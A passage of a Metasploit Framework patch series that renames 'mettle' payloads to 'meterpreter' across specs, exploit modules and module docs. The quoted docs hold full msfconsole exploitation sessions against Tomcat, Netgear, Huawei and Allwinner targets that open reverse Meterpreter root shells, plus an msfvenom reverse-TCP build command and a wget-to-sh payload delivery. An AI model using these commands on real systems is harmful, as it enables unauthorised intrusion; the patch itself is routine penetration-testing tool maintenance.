'stagers/linux/x86/bind_tcp_uuid', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/bind_tcp_uuid' + reference_name: 'linux/x86/meterpreter/bind_tcp_uuid' end - context 'linux/x86/mettle/find_tag' do + context 'linux/x86/meterpreter/find_tag' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x86/find_tag', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/find_tag' + reference_name: 'linux/x86/meterpreter/find_tag' end - context 'linux/x86/mettle/reverse_ipv6_tcp' do + context 'linux/x86/meterpreter/reverse_ipv6_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x86/reverse_ipv6_tcp', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/reverse_ipv6_tcp' + reference_name: 'linux/x86/meterpreter/reverse_ipv6_tcp' end - context 'linux/x86/mettle/reverse_nonx_tcp' do + context 'linux/x86/meterpreter/reverse_nonx_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x86/reverse_nonx_tcp', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/reverse_nonx_tcp' + reference_name: 'linux/x86/meterpreter/reverse_nonx_tcp' end - context 'linux/x86/mettle/reverse_tcp' do + context 'linux/x86/meterpreter/reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x86/reverse_tcp', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/reverse_tcp' + reference_name: 'linux/x86/meterpreter/reverse_tcp' end - context 'linux/x86/mettle/reverse_tcp_uuid' do + context 'linux/x86/meterpreter/reverse_tcp_uuid' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ 'stagers/linux/x86/reverse_tcp_uuid', - 'stages/linux/x86/mettle' + 'stages/linux/x86/meterpreter' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle/reverse_tcp_uuid' + reference_name: 'linux/x86/meterpreter/reverse_tcp_uuid' end - context 'linux/x86/mettle_reverse_tcp' do + context 'linux/x86/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/x86/mettle_reverse_tcp' + 'singles/linux/x86/meterpreter_reverse_tcp' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/x86/mettle_reverse_tcp' + reference_name: 'linux/x86/meterpreter_reverse_tcp' end - context 'linux/zarch/mettle_reverse_tcp' do + context 'linux/zarch/meterpreter_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ - 'singles/linux/zarch/mettle_reverse_tcp' + 'singles/linux/zarch/meterpreter_reverse_tcp' ], dynamic_size: false, modules_pathname: modules_pathname, - reference_name: 'linux/zarch/mettle_reverse_tcp' + reference_name: 'linux/zarch/meterpreter_reverse_tcp' end end From 078ba66e5f32c7f9bc0e377791e40bfa6f6cf1ff Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 26 Apr 2017 17:17:20 -0500 Subject: [PATCH 3/7] remove unneeded msf/core requires --- modules/payloads/stages/linux/armle/meterpreter.rb | 1 - modules/payloads/stages/linux/mipsbe/meterpreter.rb | 1 - modules/payloads/stages/linux/mipsle/meterpreter.rb | 1 - modules/payloads/stages/linux/x64/meterpreter.rb | 1 - modules/payloads/stages/linux/x86/meterpreter.rb | 1 - 5 files changed, 5 deletions(-) diff --git a/modules/payloads/stages/linux/armle/meterpreter.rb b/modules/payloads/stages/linux/armle/meterpreter.rb index 8b72c0e9e5..ce1deb0ac1 100644 --- a/modules/payloads/stages/linux/armle/meterpreter.rb +++ b/modules/payloads/stages/linux/armle/meterpreter.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/base/sessions/meterpreter_armle_linux' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' diff --git a/modules/payloads/stages/linux/mipsbe/meterpreter.rb b/modules/payloads/stages/linux/mipsbe/meterpreter.rb index e6d3884209..43165d930c 100644 --- a/modules/payloads/stages/linux/mipsbe/meterpreter.rb +++ b/modules/payloads/stages/linux/mipsbe/meterpreter.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/base/sessions/meterpreter_mipsbe_linux' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' diff --git a/modules/payloads/stages/linux/mipsle/meterpreter.rb b/modules/payloads/stages/linux/mipsle/meterpreter.rb index 4fe7615598..824c381d0e 100644 --- a/modules/payloads/stages/linux/mipsle/meterpreter.rb +++ b/modules/payloads/stages/linux/mipsle/meterpreter.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/base/sessions/meterpreter_mipsle_linux' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' diff --git a/modules/payloads/stages/linux/x64/meterpreter.rb b/modules/payloads/stages/linux/x64/meterpreter.rb index 38b5defb53..de37deca83 100644 --- a/modules/payloads/stages/linux/x64/meterpreter.rb +++ b/modules/payloads/stages/linux/x64/meterpreter.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/base/sessions/meterpreter_x64_linux' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' diff --git a/modules/payloads/stages/linux/x86/meterpreter.rb b/modules/payloads/stages/linux/x86/meterpreter.rb index 008c34eb5b..532b7779a1 100644 --- a/modules/payloads/stages/linux/x86/meterpreter.rb +++ b/modules/payloads/stages/linux/x86/meterpreter.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'msf/base/sessions/meterpreter_x86_linux' require 'msf/base/sessions/meterpreter_options' require 'msf/base/sessions/mettle_config' From 12ed3dad20ecdd17f6740824f3f6979e1e0218ad Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 26 Apr 2017 17:49:08 -0500 Subject: [PATCH 4/7] update documentation to point to meterpreter again --- .../linux/http/huawei_hg532n_cmdinject.md | 4 +- .../linux/http/netgear_r7000_cgibin_exec.md | 20 +++--- .../exploit/multi/http/tomcat_mgr_deploy.md | 68 +++++++++---------- .../exploit/multi/local/allwinner_backdoor.md | 8 +-- 4 files changed, 50 insertions(+), 50 deletions(-) diff --git a/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md b/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md index 48209d7a72..1a832beb93 100644 --- a/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md +++ b/documentation/modules/exploit/linux/http/huawei_hg532n_cmdinject.md @@ -38,7 +38,7 @@ that through command injection to gain Meterpreter root access. With an attacker node that resides within the ISP network, do: -- Set `payload` to `linux/mipsbe/mettle_reverse_tcp` +- Set `payload` to `linux/mipsbe/meterpreter_reverse_tcp` - Set `RHOST` to the target router's IP @@ -73,7 +73,7 @@ module's own HTTP server and host it externally. To do so, first generate the payload ELF executable using `msfvenom`: ``` -$ msfvenom --format elf --arch mipsbe --platform linux --payload linux/mipsbe/mettle/reverse_tcp --out payload.elf LHOST='41.34.32.121' LPORT=4444 +$ msfvenom --format elf --arch mipsbe --platform linux --payload linux/mipsbe/meterpreter/reverse_tcp --out payload.elf LHOST='41.34.32.121' LPORT=4444 No encoder or badchars specified, outputting raw payload Payload size: 212 bytes diff --git a/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md b/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md index cc1c3d4826..6bae8bef37 100644 --- a/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md +++ b/documentation/modules/exploit/linux/http/netgear_r7000_cgibin_exec.md @@ -17,17 +17,17 @@ Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and po ## Options **PAYLOAD** - - The valid payloads are `mettle` payloads _only_. The payload uses the `wget` flavor and pipes the downloaded binary to `sh` + + The valid payloads are `meterpreter` payloads _only_. The payload uses the `wget` flavor and pipes the downloaded binary to `sh` ## Scenarios Sample output of a successful session: - + ``` msf exploit(netgear_r7000_cgibin_exec) > run -[*] Started reverse TCP handler on 127.0.0.1:4444 +[*] Started reverse TCP handler on 127.0.0.1:4444 [*] Router is a NETGEAR router (R7000) [+] Router may be vulnerable (NETGEAR R7000) [*] Using URL: http://0.0.0.0:8080/ @@ -35,16 +35,16 @@ Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and po [*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54168) at 2017-03-10 15:56:21 -0600 [*] Server stopped. -meterpreter > getuid +meterpreter > getuid Server username: uid=0, gid=0, euid=0, egid=0 -meterpreter > sysinfo +meterpreter > sysinfo Computer : 192.168.1.4 OS : (Linux 2.6.36.4brcmarm+) Architecture : armv7l Meterpreter : armle/linux -meterpreter > +meterpreter > ``` - + As you can see, the `uid` is 0, meaning you have root access. - - + + diff --git a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md index 36f2dd0834..db7af1adde 100644 --- a/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md +++ b/documentation/modules/exploit/multi/http/tomcat_mgr_deploy.md @@ -32,7 +32,7 @@ For this exploitation, it was changed to simply `manager`. 3. Exploit: ``` - msf > use exploit/multi/http/tomcat_mgr_deploy + msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108 rhost => 192.168.2.108 msf exploit(tomcat_mgr_deploy) > set verbose true @@ -43,7 +43,7 @@ For this exploitation, it was changed to simply `manager`. HttpUsername => tomcat msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 lhost => 192.168.2.117 - msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(tomcat_mgr_deploy) > set target 1 target => 1 @@ -54,8 +54,8 @@ For this exploitation, it was changed to simply `manager`. msf exploit(tomcat_mgr_deploy) > check [*] 192.168.2.108:8086 The target appears to be vulnerable. msf exploit(tomcat_mgr_deploy) > exploit - - [*] Started reverse TCP handler on 192.168.2.117:4444 + + [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Using manually select target "Java Universal" [*] Uploading 6071 bytes as scEYoK0.war ... [!] No active DB -- Credential data will not be saved! @@ -63,12 +63,12 @@ For this exploitation, it was changed to simply `manager`. [*] Undeploying scEYoK0 ... [*] Sending stage (49409 bytes) to 192.168.2.108 [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.108:1663) at 2017-01-14 14:30:52 -0500 - + meterpreter > sysinfo Computer : winxp OS : Windows XP 5.1 (x86) Meterpreter : java/windows - + ``` ### Tomcat 7 (7.0.73) @@ -96,7 +96,7 @@ Of note, the user was given `manager-gui` permissions by default. 3. Exploitation: ``` - msf > use exploit/multi/http/tomcat_mgr_deploy + msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108 rhost => 192.168.2.108 msf exploit(tomcat_mgr_deploy) > set path /manager/text @@ -111,15 +111,15 @@ Of note, the user was given `manager-gui` permissions by default. lhost => 192.168.2.117 msf exploit(tomcat_mgr_deploy) > set rport 8087 rport => 8087 - msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(tomcat_mgr_deploy) > set target 1 target => 1 msf exploit(tomcat_mgr_deploy) > check [*] 192.168.2.108:8087 The target appears to be vulnerable. msf exploit(tomcat_mgr_deploy) > exploit - - [*] Started reverse TCP handler on 192.168.2.117:4444 + + [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Using manually select target "Java Universal" [*] Uploading 6086 bytes as Cl6t6gurtwIO59zV3Lt6.war ... [!] No active DB -- Credential data will not be saved! @@ -127,7 +127,7 @@ Of note, the user was given `manager-gui` permissions by default. [*] Undeploying Cl6t6gurtwIO59zV3Lt6 ... [*] Sending stage (49409 bytes) to 192.168.2.108 [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1656) at 2017-01-14 14:27:21 -0500 - + meterpreter > sysinfo Computer : winxp OS : Windows XP 5.1 (x86) @@ -159,12 +159,12 @@ Of note, the user was given `manager-gui` permissions by default. 3. Exploitation: ``` - msf > use exploit/multi/http/tomcat_mgr_deploy + msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108 rhost => 192.168.2.108 msf exploit(tomcat_mgr_deploy) > set rport 8088 rport => 8088 - msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 lhost => 192.168.2.117 @@ -178,15 +178,15 @@ Of note, the user was given `manager-gui` permissions by default. msf exploit(tomcat_mgr_deploy) > set path /manager/text path => /manager/text msf exploit(tomcat_mgr_deploy) > exploit - - [*] Started reverse TCP handler on 192.168.2.117:4444 + + [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Using manually select target "Java Universal" [*] Uploading 6085 bytes as c6TYmkd8YAe8LqKQhSCr.war ... [*] Executing /c6TYmkd8YAe8LqKQhSCr/PtW1uMsYCIFP1gs16PUiwE7oc.jsp... [*] Undeploying c6TYmkd8YAe8LqKQhSCr ... [*] Sending stage (49409 bytes) to 192.168.2.108 [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1196) at 2017-01-14 10:24:52 -0500 - + meterpreter > sysinfo Computer : winxp OS : Windows XP 5.1 (x86) @@ -215,7 +215,7 @@ Of note, the user was given `manager-gui` permissions by default. 3. Exploit: ``` - msf > use exploit/multi/http/tomcat_mgr_deploy + msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.156 rhost => 192.168.2.156 msf exploit(tomcat_mgr_deploy) > set rport 8080 @@ -226,15 +226,15 @@ Of note, the user was given `manager-gui` permissions by default. HttpUsername => tomcat msf exploit(tomcat_mgr_deploy) > set HttpPassword tomcat HttpPassword => tomcat - msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp - payload => linux/x86/mettle/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp + payload => linux/x86/meterpreter/reverse_tcp msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(tomcat_mgr_deploy) > set target 3 target => 3 msf exploit(tomcat_mgr_deploy) > exploit - - [*] Started reverse TCP handler on 192.168.2.117:4444 + + [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Using manually select target "Linux x86" [*] Uploading 1545 bytes as 9bj4IYa66cSpdK.war ... [!] No active DB -- Credential data will not be saved! @@ -243,7 +243,7 @@ Of note, the user was given `manager-gui` permissions by default. [*] Sending stage (335800 bytes) to 192.168.2.156 [*] Undeploying 9bj4IYa66cSpdK ... [*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.156:40020) at 2017-01-11 21:18:31 -0500 - + meterpreter > sysinfo Computer : Ubuntu14.04 OS : Ubuntu 14.04 (Linux 4.2.0-27-generic) @@ -273,15 +273,15 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev 3. Exploit: ``` - msf > use exploit/multi/http/tomcat_mgr_deploy + msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118 rhost => 192.168.2.118 msf exploit(tomcat_mgr_deploy) > set rport 8087 rport => 8087 msf exploit(tomcat_mgr_deploy) > set target 3 target => 3 - msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp - payload => linux/x86/mettle/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp + payload => linux/x86/meterpreter/reverse_tcp msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat @@ -294,8 +294,8 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev msf exploit(tomcat_mgr_deploy) > set path /manager/text path => /manager/text msf exploit(tomcat_mgr_deploy) > exploit - - [*] Started reverse TCP handler on 192.168.2.117:4444 + + [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Using manually select target "Linux x86" [*] Uploading 1579 bytes as 9QymzSGGU0H4e.war ... [!] No active DB -- Credential data will not be saved! @@ -304,7 +304,7 @@ Of note, as of Tomcat 7, the permission role `manager` has been divided into sev [*] Transmitting intermediate stager...(106 bytes) [*] Sending stage (335800 bytes) to 192.168.2.118 [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:34294) at 2017-01-08 20:35:24 -0500 - + meterpreter > sysinfo Computer : 192.168.2.118 OS : Ubuntu 16.04 (Linux 4.4.0-21-generic) @@ -335,15 +335,15 @@ Of note, as of 7, the permission role 'manager' has been divided into several su 3. Exploit: ``` - msf > use exploit/multi/http/tomcat_mgr_deploy + msf > use exploit/multi/http/tomcat_mgr_deploy msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.118 rhost => 192.168.2.118 msf exploit(tomcat_mgr_deploy) > set rport 8088 rport => 8088 msf exploit(tomcat_mgr_deploy) > set target 3 target => 3 - msf exploit(tomcat_mgr_deploy) > set payload linux/x86/mettle/reverse_tcp - payload => linux/x86/mettle/reverse_tcp + msf exploit(tomcat_mgr_deploy) > set payload linux/x86/meterpreter/reverse_tcp + payload => linux/x86/meterpreter/reverse_tcp msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(tomcat_mgr_deploy) > set HttpUsername tomcat @@ -355,8 +355,8 @@ Of note, as of 7, the permission role 'manager' has been divided into several su msf exploit(tomcat_mgr_deploy) > set path /manager/text path => /manager/text msf exploit(tomcat_mgr_deploy) > exploit - - [*] Started reverse TCP handler on 192.168.2.117:4444 + + [*] Started reverse TCP handler on 192.168.2.117:4444 [*] Using manually select target "Linux x86" [*] Uploading 1560 bytes as 9s0fTUyPa2HJCDnod2wEQJ.war ... [!] No active DB -- Credential data will not be saved! @@ -365,7 +365,7 @@ Of note, as of 7, the permission role 'manager' has been divided into several su [*] Transmitting intermediate stager...(106 bytes) [*] Sending stage (335800 bytes) to 192.168.2.118 [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.118:33802) at 2017-01-14 11:06:13 -0500 - + meterpreter > sysinfo Computer : 192.168.2.118 OS : Ubuntu 16.04 (Linux 4.4.0-59-generic) diff --git a/documentation/modules/exploit/multi/local/allwinner_backdoor.md b/documentation/modules/exploit/multi/local/allwinner_backdoor.md index 230c8918e2..7c3087621d 100644 --- a/documentation/modules/exploit/multi/local/allwinner_backdoor.md +++ b/documentation/modules/exploit/multi/local/allwinner_backdoor.md @@ -38,8 +38,8 @@ msf exploit(allwinner_backdoor) > set verbose true verbose => true msf exploit(allwinner_backdoor) > set session 1 session => 1 -msf exploit(allwinner_backdoor) > set payload linux/armle/mettle/reverse_tcp -payload => linux/armle/mettle/reverse_tcp +msf exploit(allwinner_backdoor) > set payload linux/armle/meterpreter/reverse_tcp +payload => linux/armle/meterpreter/reverse_tcp msf exploit(allwinner_backdoor) > set lhost 192.168.2.117 lhost => 192.168.2.117 msf exploit(allwinner_backdoor) > check @@ -50,7 +50,7 @@ msf exploit(allwinner_backdoor) > exploit ## Successful exploitation: ``` -[*] Started reverse TCP handler on 192.168.2.117:4444 +[*] Started reverse TCP handler on 192.168.2.117:4444 [*] Transmitting intermediate stager...(136 bytes) [*] Sending stage (374540 bytes) to 192.168.2.248 [+] Backdoor Found, writing payload to /tmp/odzVx.elf @@ -68,4 +68,4 @@ Computer : 192.168.2.248 OS : Ubuntu 14.04 (Linux 3.4.39) Architecture : armv7l Meterpreter : armle/linux -``` \ No newline at end of file +``` From a60e5789ed184f0b64d64fb1df299a1477185e97 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 26 Apr 2017 17:55:10 -0500 Subject: [PATCH 5/7] update mettle->meterpreter references in modules --- .../exploits/android/browser/stagefright_mp4_tx3g_64bit.rb | 6 ++---- modules/exploits/android/local/futex_requeue.rb | 5 +---- modules/exploits/android/local/put_user_vroot.rb | 5 +---- modules/exploits/linux/http/dlink_hnap_login_bof.rb | 6 ++---- modules/exploits/linux/http/huawei_hg532n_cmdinject.rb | 3 +-- modules/exploits/linux/http/mvpower_dvr_shell_exec.rb | 2 +- modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb | 6 ++---- modules/exploits/linux/local/bpf_priv_esc.rb | 6 ++---- modules/exploits/linux/local/ntfs3g_priv_esc.rb | 6 ++---- modules/exploits/multi/local/allwinner_backdoor.rb | 4 +--- 10 files changed, 15 insertions(+), 34 deletions(-) diff --git a/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb b/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb index 5e40121d5a..72f037d167 100644 --- a/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb +++ b/modules/exploits/android/browser/stagefright_mp4_tx3g_64bit.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' - class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking @@ -67,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Space' => 2048, 'DisableNops' => true, }, - #'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/mettle/reverse_tcp' }, + #'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' }, 'Platform' => 'linux', 'Arch' => [ARCH_ARMLE], # TODO: , ARCH_X86, ARCH_X64, ARCH_MIPSLE], 'Targets' => @@ -354,7 +352,7 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) - ], self.class) + ]) =end end diff --git a/modules/exploits/android/local/futex_requeue.rb b/modules/exploits/android/local/futex_requeue.rb index feea58dc59..7e3eabad70 100644 --- a/modules/exploits/android/local/futex_requeue.rb +++ b/modules/exploits/android/local/futex_requeue.rb @@ -3,9 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' -require 'rex' - class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking @@ -39,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Local 'DefaultOptions' => { 'WfsDelay' => 300, - 'PAYLOAD' => 'linux/armle/mettle/reverse_tcp', + 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', }, 'DefaultTarget' => 0, 'Targets' => [ diff --git a/modules/exploits/android/local/put_user_vroot.rb b/modules/exploits/android/local/put_user_vroot.rb index 6dfca95677..bdd8deb2bc 100644 --- a/modules/exploits/android/local/put_user_vroot.rb +++ b/modules/exploits/android/local/put_user_vroot.rb @@ -3,9 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' -require 'rex' - class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking @@ -44,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Local 'DefaultOptions' => { 'WfsDelay' => 120, - 'PAYLOAD' => 'linux/armle/mettle/reverse_tcp', + 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp', }, 'DefaultTarget' => 0, } diff --git a/modules/exploits/linux/http/dlink_hnap_login_bof.rb b/modules/exploits/linux/http/dlink_hnap_login_bof.rb index 8495659ee5..cf9d9f107d 100644 --- a/modules/exploits/linux/http/dlink_hnap_login_bof.rb +++ b/modules/exploits/linux/http/dlink_hnap_login_bof.rb @@ -3,15 +3,13 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' - # Payload working status: # MIPS: # - all valid payloads working (the ones that we are able to send without null bytes) # ARM: # - inline rev/bind shell works (bind... meh sometimes) # - stager rev/bind shell FAIL -# - mettle rev/bind fails with sigsegv standalone, but works under strace or gdb... +# - meterpreter rev/bind fails with sigsegv standalone, but works under strace or gdb... class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking @@ -95,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote OptString.new('SRVPORT', [true, 'Port for the HTTP server (ARM only)', '3333']), OptString.new('SHELL', [true, 'Don\'t change this', '/bin/sh']), OptString.new('SHELLARG', [true, 'Don\'t change this', 'sh']), - ], self.class) + ]) end def check diff --git a/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb b/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb index b41217467a..4a04ddc7e1 100644 --- a/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb +++ b/modules/exploits/linux/http/huawei_hg532n_cmdinject.rb @@ -3,7 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'base64' class MetasploitModule < Msf::Exploit::Remote @@ -40,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Privileged' => true, 'DefaultOptions' => { - 'PAYLOAD' => 'linux/mipsbe/mettle_reverse_tcp' + 'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp' }, 'Targets' => [ diff --git a/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb b/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb index dc2ecb8c44..5498a94f5d 100644 --- a/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb +++ b/modules/exploits/linux/http/mvpower_dvr_shell_exec.rb @@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Arch' => ARCH_ARMLE, 'DefaultOptions' => { - 'PAYLOAD' => 'linux/armle/mettle_reverse_tcp', + 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp', 'CMDSTAGER::FLAVOR' => 'wget' }, 'Targets' => diff --git a/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb b/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb index 218d39513d..b2f5c1a4da 100644 --- a/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb +++ b/modules/exploits/linux/http/netgear_r7000_cgibin_exec.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' - class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking @@ -39,14 +37,14 @@ class MetasploitModule < Msf::Exploit::Remote 'DisclosureDate' => 'Dec 06 2016', 'DefaultOptions' => { - 'PAYLOAD' => 'linux/armle/mettle_reverse_tcp' + 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp' } )) register_options( [ Opt::RPORT(80) - ], self.class) + ]) deregister_options('URIPATH') end diff --git a/modules/exploits/linux/local/bpf_priv_esc.rb b/modules/exploits/linux/local/bpf_priv_esc.rb index 3ef0164fea..30bfd6b3b3 100644 --- a/modules/exploits/linux/local/bpf_priv_esc.rb +++ b/modules/exploits/linux/local/bpf_priv_esc.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' - class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking @@ -43,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Local ], 'DefaultOptions' => { - 'payload' => 'linux/x64/mettle/reverse_tcp', + 'payload' => 'linux/x64/meterpreter/reverse_tcp', 'PrependFork' => true, 'WfsDelay' => 60 # we can chew up a lot of CPU for this, so we want to give time for payload to come through }, @@ -56,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Local OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', ['Auto', 'True', 'False']]), OptInt.new('MAXWAIT', [ true, 'Max seconds to wait for decrementation in seconds', 120 ]) - ], self.class) + ]) end def check diff --git a/modules/exploits/linux/local/ntfs3g_priv_esc.rb b/modules/exploits/linux/local/ntfs3g_priv_esc.rb index c77de2e172..08ee7e2566 100644 --- a/modules/exploits/linux/local/ntfs3g_priv_esc.rb +++ b/modules/exploits/linux/local/ntfs3g_priv_esc.rb @@ -3,8 +3,6 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' - class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking @@ -41,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Local ], 'DefaultOptions' => { - 'payload' => 'linux/x64/mettle/reverse_tcp', + 'payload' => 'linux/x64/meterpreter/reverse_tcp', 'PrependFork' => true, }, 'DefaultTarget' => 1, @@ -51,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Local )) register_options([ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) - ], self.class) + ]) end def check diff --git a/modules/exploits/multi/local/allwinner_backdoor.rb b/modules/exploits/multi/local/allwinner_backdoor.rb index 52cc1e182f..94b376abc2 100644 --- 